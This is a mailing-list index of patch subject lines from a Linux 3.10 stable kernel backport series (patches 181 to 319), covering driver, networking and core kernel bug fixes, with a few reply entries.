2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 192/319] i2c: at91: fix write transfers by clearing pending interrupt first Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 193/319] iio: accel: kxsd9: Fix raw read return Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 194/319] iio: accel: kxsd9: Fix scaling bug Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 195/319] thermal: hwmon: Properly report critical temperature in sysfs Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 196/319] cdc-acm: fix wrong pipe type on rx interrupt xfers Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 197/319] timers: Use proper base migration in add_timer_on() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 198/319] EDAC: Increment correct counter in edac_inc_ue_error() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 199/319] IB/srpt: Simplify srpt_handle_tsk_mgmt() Willy Tarreau
2017-02-06  5:14   ` Bart Van Assche
2017-02-06  6:32     ` Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 200/319] IB/ipoib: Fix memory corruption in ipoib cm mode connect flow Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 201/319] IB/core: Fix use after free in send_leave function Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 209/319] mtd: nand: davinci: Reinitialize the HW ECC engine in 4bit hwctl Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 210/319] perf symbols: Fixup symbol sizes before picking best ones Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 211/319] perf: Tighten (and fix) the grouping condition Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 212/319] tty: Prevent ldisc drivers from re-using stale tty fields Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 213/319] tty: limit terminal size to 4M chars Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 214/319] tty: vt, fix bogus division in csi_J Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 215/319] vt: clear selection before resizing Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 233/319] tcp: fix overflow in __tcp_retransmit_skb() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 234/319] tcp: fix wrong checksum calculation on MTU probing Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 235/319] tcp: take care of truncations done by sk_filter() Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 236/319] bonding: Fix bonding crash Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 237/319] net: ratelimit warnings about dst entry refcount underflow or overflow Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 238/319] mISDN: Support DR6 indication in mISDNipac driver Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 256/319] packet: call fanout_release, while UNREGISTERING a netdev Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 257/319] net: sctp, forbid negative length Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 258/319] sctp: validate chunk len before actually using it Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 259/319] net: clear sk_err_soft in sk_clone_lock() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 260/319] net: mangle zero checksum in skb_checksum_help() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
2017-02-05 19:49   ` Joe Perches
2017-02-05 20:35     ` Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
2017-02-06  8:06   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
2017-02-06  8:05   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
2017-02-06  8:04   ` Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 289/319] mfd: core: Fix device reference leak in mfd_clone_cell Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 290/319] PM / sleep: fix device reference leak in test_suspend Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 291/319] mmc: mxs: Initialize the spinlock prior to using it Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 292/319] mmc: block: don't use CMD23 with very old MMC cards Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 293/319] pstore/core: drop cmpxchg based updates Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 294/319] pstore/ram: Use memcpy_toio instead of memcpy Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 295/319] pstore/ram: Use memcpy_fromio() to save old buffer Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 296/319] mb86a20s: fix the locking logic Willy Tarreau
2017-02-05 19:21 ` [PATCH 3.10 297/319] mb86a20s: fix demod settings Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 298/319] cx231xx: don't return error on success Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 299/319] cx231xx: fix GPIOs for Pixelview SBTVD hybrid Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 300/319] gpio: mpc8xxx: Correct irq handler function Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 301/319] uio: fix dmem_region_start computation Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 302/319] KEYS: Fix short sprintf buffer in /proc/keys show function Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 303/319] hv: do not lose pending heartbeat vmbus packets Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 304/319] staging: iio: ad5933: avoid uninitialized variable in error case Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 305/319] mei: bus: fix received data size check in NFC fixup Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 306/319] ACPI / APEI: Fix incorrect return value of ghes_proc() Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau
